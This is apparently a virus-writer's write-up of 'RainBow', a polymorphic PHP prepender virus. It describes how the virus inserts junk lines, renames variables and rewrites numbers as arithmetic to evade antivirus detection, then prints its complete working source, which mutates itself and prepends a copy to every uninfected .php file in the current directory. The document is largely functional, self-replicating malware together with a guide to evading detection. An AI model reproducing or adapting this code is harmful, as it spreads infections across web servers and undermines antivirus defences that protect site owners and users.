HackPR.NET

--> Adding Trash/Junk/Garbage
      The Virus adds ine in two lines a junk line to the code.
      This Junk-line could contain:
      - // anything
      - $anything='anything';
      - $anything=number;
      Because the code would be damn big after the 5th generation, I desided
      to delete the trash after every generation and make a new one. Anyway,
      the chance to get a trash-line will be bigger, because there are more
      lines (more lines --> more chance). But I tested about 30 generation
      and it's no big problem with the size.

      --> Changing Variable/function names
      The Virus uses an array with all variable/function names of the virus,
      every generation it changes every array-entry (every name) to a 5-15
      sign long new name.

      --> Number changing
      The virus is able to change every number in the code. This is a real
      successfull way to fake AVs, i think! A number (for instands '10') could
      also be one of the following things:
      10=(8+2)
      10=(19-9)
      10=(130/13)
      It's easy to understand, I think. I desided to change ever 5th number I can
      find, because it looks better than changing every number every generation.


    * Infection Method

      --> Prepender
      This code is a prepender virus, which doesn't harm the victim file.
      It reads the first PHP part (which is the whole virus code) of the current
      file (__FILE__, as it's called in PHP). Than it searchs for every PHP-files
      in the current directory, and adds the changed virus code at the beginn of
      the victim file. Before infecting the virus checks, if there's already an
      infection mark or the virus, which is 'RainBow'.

  Something else little interesting is, that it's hard to get many different generations from
  the virus, because it just changes, if it infects a file. And just the infected file has the
  different form, not the old virus. That's a little trick, which I read in an article about
  Polymorphism by SnakeByte. He wrote, that it will use more time to get many generations, which
  is a problem for AVs (who needs many generations ).

   In the end I want to thank the following people, which made it possible, that I
   wrote this virus :)

<?php // RainBowsrand((double)microtime()*1000000); $changevars=array('changevars','string','newcont','curdir','filea','victim','viccont','newvars','returnvar','counti','countj','trash','allcont','number','remn'); $string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10)); $newcont='<?php // RainBow'.chr(13).chr(10);while ($string && $string!='?>

'){
if(rand(0,1)){
if(rand(0,1)){$newcont.='// '.trash('',0).chr(13).chr(10);}
if(rand(0,1)){$newcont.='$'.trash('',0).'='.chr(39).trash('',0).chr(39).';'.chr(13).chr(10);}
if(rand(0,1)){$newcont.='$'.trash('',0).'='.rand().';'.chr(13).chr(10);}}
$string=strtok(chr(13).chr(10));
if($string{0}!='/' && $string{0}!='$'){$newcont.=$string.chr(13).chr(10);}}
$counti=0;
while($changevars[$counti]){
$newcont=str_replace($changevars[$counti++],trash('',0),$newcont);}
$countj=-1; $number='';
while(++$countj<strlen($newcont)){
if (ord($newcont{$countj})>47&&ord($newcont{$countj})<58){
$number=$newcont{$countj};
while(ord($newcont{++$countj})>47&&ord($newcont{$countj})<58){$number.=$newcont{$countj};}
$remn=rand(1,10);
if (!rand(0,5)){switch(rand(1,3)){case 1:$allcont.='('.($number-$remn).'+'.$remn.')';break;
case 2:$allcont.='('.($number+$remn).'-'.$remn.')';break;
case 3:$allcont.='('.($number*$remn).'/'.$remn.')';break;}}else{$allcont.=$number;}}
$allcont.=$newcont{$countj};$number='';}
$curdir=opendir('.');
while($filea=readdir($curdir)){
if(strstr($filea,'.php')){$victim=fopen($filea,'r+');
if (!strstr(fread($victim, 25),'RainBow')){rewind($victim);
$viccont=fread($victim,filesize($filea));
rewind($victim);
fwrite($victim,$allcont.$viccont);}
fclose($victim);}}
closedir($curdir);
function trash($returnvar, $countj){
do{$returnvar.=chr(rand(97,122));}while($countj++<rand(5,15));
return $returnvar;}
?>